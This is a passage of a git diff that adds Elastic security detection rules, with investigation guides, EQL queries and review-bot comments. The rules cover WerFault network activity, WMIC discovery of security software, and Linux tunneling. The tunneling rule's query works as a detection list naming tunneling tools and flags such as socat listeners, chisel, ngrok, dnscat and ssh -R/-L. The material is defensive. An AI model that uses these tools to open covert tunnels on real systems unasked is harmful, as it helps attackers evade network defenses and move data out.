entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan = 5s\n [process where host.os.type == \"windows\" and event.type:\"start\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : (\"wermgr.exe\", \"WerFault.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and destination.ip !=\"::1\" and destination.ip !=\"127.0.0.1\"\n ]\n", + "references": [ + "https://twitter.com/SBousseaden/status/1235533224337641473", + "https://www.hexacorn.com/blog/2019/09/20/werfault-command-line-switches-v0-1/", + "https://app.any.run/tasks/26051d84-b68e-4afb-8a9a-76921a271b81/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.direction", + "type": "keyword" + }, + { + "ecs": true, + "name": "network.protocol", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "6ea41894-66c3-4df7-ad6b-2c5074eb3df8", + "severity": "medium", + 
"tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1036", + "name": "Masquerading", + "reference": "https://attack.mitre.org/techniques/T1036/", + "subtechnique": [ + { + "id": "T1036.005", + "name": "Match Legitimate Name or Location", + "reference": "https://attack.mitre.org/techniques/T1036/005/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "6ea41894-66c3-4df7-ad6b-2c5074eb3df8_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_110.json b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_110.json new file mode 100644 index 00000000000..0853e24f06a --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/6ea55c81-e2ba-42f2-a134-bccf857ba922_110.json 
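Review bot: The triage note ends its host-examination steps with "search for login events (for example, 4624) to the target host after the registry modification", but this rule keys on a process start followed by a network connection and reads no registry data, so the clause appears copied from another guide; `after the process start that triggered the alert` (or dropping the trailing clause) would match what the rule actually detects. The second sequence step excludes only `::1` and `127.0.0.1`, so a connection to any other address in 127.0.0.0/8 still satisfies it; `not cidrMatch(destination.ip, "127.0.0.0/8", "::1/128")` covers the whole loopback range in one clause and is easier to extend. The `false_positives` entry ("Legit Application Crash with rare Werfault commandline value") describes a command line, while the query requires `process.args_count == 1`, i.e. no arguments at all; rewording it to say an argument-less crash handler start would keep the two consistent.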
@@ -0,0 +1,116 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "building_block_type": "default",
+ "description": "Identifies the use of Windows Management Instrumentation Command (WMIC) to discover certain System Security Settings such as AntiVirus or Host Firewall details.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "winlogbeat-*",
+ "logs-windows.*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Security Software Discovery using WMIC",
+ "note": "## Triage and analysis\n\n### Investigating Security Software Discovery using WMIC\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software.\n\nThis rule looks for the execution of the `wmic` utility with arguments compatible to the enumeration of the security software installed on the host. Attackers can use this information to decide whether or not to infect a system, disable protections, use bypasses, etc.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. 
As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"windows\" and event.type == \"start\" and\n(process.name : \"wmic.exe\" or process.pe.original_file_name : \"wmic.exe\") and\nprocess.args : \"/namespace:\\\\\\\\root\\\\SecurityCenter2\" and process.args : \"Get\"\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^1.5.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.pe.original_file_name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "6ea55c81-e2ba-42f2-a134-bccf857ba922",
+ "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define 
`event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Discovery",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Endgame",
+ "Data Source: Elastic Defend",
+ "Rule Type: BBR"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0007",
+ "name": "Discovery",
+ "reference": "https://attack.mitre.org/tactics/TA0007/"
+ },
+ "technique": [
+ {
+ "id": "T1518",
+ "name": "Software Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1518/",
+ "subtechnique": [
+ {
+ "id": "T1518.001",
+ "name": "Security Software Discovery",
+ "reference": "https://attack.mitre.org/techniques/T1518/001/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1047",
+ "name": "Windows Management Instrumentation",
+ "reference": "https://attack.mitre.org/techniques/T1047/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 110
+ },
+ "id": "6ea55c81-e2ba-42f2-a134-bccf857ba922_110",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_5.json b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_5.json
new file mode 100644
index 00000000000..c3038732636
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_5.json
@@ -0,0 +1,99 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Linux Tunneling and/or Port Forwarding",
+ "note": "## Triage and analysis\n\n### Investigating Potential Linux Tunneling and/or Port Forwarding\n\nAttackers can leverage many utilities to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for several utilities that are capable of setting up tunnel network communications by analyzing process names or command line arguments. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. 
This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n- Suspicious Utility Launched via ProxyChains - 6ace94ba-f02c-4d55-9f53-87d99b6f9af4\n- ProxyChains Activity - 4b868f1f-15ff-4ba3-8c11-d5a7a6356d37\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling/forwarding for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"linux\" and event.action in (\"exec\", \"exec_event\") and\nevent.type == \"start\" and (\n (\n // gost & pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count >= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count >= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count >= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n",
+ "references": [
+ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform",
+ "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true, 
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args_count",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "6ee947e9-de7e-4281-a55d-09289bdf947e",
+ "setup": "This rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1572",
+ "name": "Protocol Tunneling",
+ "reference": "https://attack.mitre.org/techniques/T1572/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 5
+ },
+ "id": "6ee947e9-de7e-4281-a55d-09289bdf947e_5",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_6.json b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_6.json
new file mode 100644
index 00000000000..13fec0a11f8
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/6ee947e9-de7e-4281-a55d-09289bdf947e_6.json
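Review bot: In the `query` string of this hunk the ssh branch tests `process.args in ("-R", "-L", "D", "-w")`; the bare `"D"` looks like a typo for `"-D"` (ssh's dynamic/SOCKS forwarding flag), so the rule as written would not fire on an `ssh -D` invocation even though that is the classic port-forwarding case it sets out to cover. The same string appears in the `_6` version of this rule in the hunk that follows (its query only reorders the `event.type` and `event.action` clauses), so both versions carry the gap. If these JSON files are synced from the upstream detection-rules repository, the fix belongs there followed by a re-export rather than a hand edit here; the one-line change would be `process.args in ("-R", "-L", "-D", "-w")`.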
@@ -0,0 +1,99 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "This rule monitors for a set of Linux utilities that can be used for tunneling and port forwarding. Attackers can leverage tunneling and port forwarding techniques to bypass network defenses, establish hidden communication channels, and gain unauthorized access to internal resources, facilitating data exfiltration, lateral movement, and remote control.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*",
+ "endgame-*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Potential Linux Tunneling and/or Port Forwarding",
+ "note": "## Triage and analysis\n\n### Investigating Potential Linux Tunneling and/or Port Forwarding\n\nAttackers can leverage many utilities to clandestinely tunnel network communications and evade security measures, potentially gaining unauthorized access to sensitive systems.\n\nThis rule looks for several utilities that are capable of setting up tunnel network communications by analyzing process names or command line arguments. \n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible investigation steps\n\n- Identify any signs of suspicious network activity or anomalies that may indicate protocol tunneling. 
This could include unexpected traffic patterns or unusual network behavior.\n - Investigate listening ports and open sockets to look for potential protocol tunneling, reverse shells, or data exfiltration.\n - !{osquery{\"label\":\"Osquery - Retrieve Listening Ports\",\"query\":\"SELECT pid, address, port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n- Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - !{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Process Info\",\"query\":\"SELECT name, cmdline, parent, path, uid FROM processes\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n\n### Related rules\n\n- Potential Protocol Tunneling via Chisel Client - 3f12325a-4cc6-410b-8d4c-9fbbeb744cfd\n- Potential Protocol Tunneling via Chisel Server - ac8805f6-1e08-406c-962e-3937057fa86f\n- Potential Protocol Tunneling via EarthWorm - 9f1c4ca3-44b5-481d-ba42-32dc215a2769\n- Suspicious Utility Launched via ProxyChains - 6ace94ba-f02c-4d55-9f53-87d99b6f9af4\n- ProxyChains Activity - 4b868f1f-15ff-4ba3-8c11-d5a7a6356d37\n\n### False positive analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator or developer who uses port tunneling/forwarding for benign purposes, consider adding exceptions for specific user accounts or hosts. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors, such as reverse shells, reverse proxies, or droppers, that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\") and (\n (\n // gost & pivotnacci - spawned without process.parent.name\n (process.name == \"gost\" and process.args : (\"-L*\", \"-C*\", \"-R*\")) or (process.name == \"pivotnacci\")) or (\n // ssh\n (process.name in (\"ssh\", \"sshd\") and (process.args in (\"-R\", \"-L\", \"D\", \"-w\") and process.args_count >= 4 and \n not process.args : \"chmod\")) or\n // sshuttle\n (process.name == \"sshuttle\" and process.args in (\"-r\", \"--remote\", \"-l\", \"--listen\") and process.args_count >= 4) or\n // socat\n (process.name == \"socat\" and process.args : (\"TCP4-LISTEN:*\", \"SOCKS*\") and process.args_count >= 3) or\n // chisel\n (process.name : \"chisel*\" and process.args in (\"client\", \"server\")) or\n // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok \n (process.name in (\"iodine\", \"iodined\", \"dnscat\", \"hans\", \"hans-ubuntu\", \"ptunnel-ng\", \"ssf\", \"3proxy\", \"ngrok\"))\n ) and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")\n)\n",
+ "references": [
+ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform",
+ "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding"
+ ],
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true, 
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.args_count",
+ "type": "long"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.parent.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "6ee947e9-de7e-4281-a55d-09289bdf947e",
+ "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Data Source: Elastic Defend",
+ "Data Source: Elastic Endgame"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1572",
+ "name": "Protocol Tunneling",
+ "reference": "https://attack.mitre.org/techniques/T1572/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 6
+ },
+ "id": "6ee947e9-de7e-4281-a55d-09289bdf947e_6",
+ "type": "security-rule"
+}
\ No newline at end of file
